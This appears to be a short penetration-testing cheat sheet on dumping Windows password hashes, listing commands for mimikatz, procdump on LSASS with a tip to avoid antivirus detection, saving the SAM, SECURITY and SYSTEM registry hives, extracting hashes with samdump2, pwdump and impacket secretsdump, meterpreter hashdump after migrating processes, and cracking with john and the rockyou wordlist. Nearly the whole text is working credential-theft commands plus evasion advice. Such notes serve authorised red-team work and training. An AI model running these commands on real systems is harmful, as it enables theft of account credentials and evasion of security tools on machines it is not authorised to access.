hashes
mimikatz to extract creds from memory
Use windows procdump on LSASS and analyze offline to avoid AV detection
// save a copy of SAM DB
reg save hklm\sam sam.save
reg save hklm\security security.save
reg save hklm\system system.save
samdump 2 system.save sam.save
pwdump system.save sam.save
python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCAL
meterpreter
hashdump
john myhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT-old
Trying to hashdump will initially FAIL
// priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
migrate to another process ID and then hashdump (which should work)
migrate 1556
hashdump
// grab the hashes to crack offline
Last updated
Was this helpful?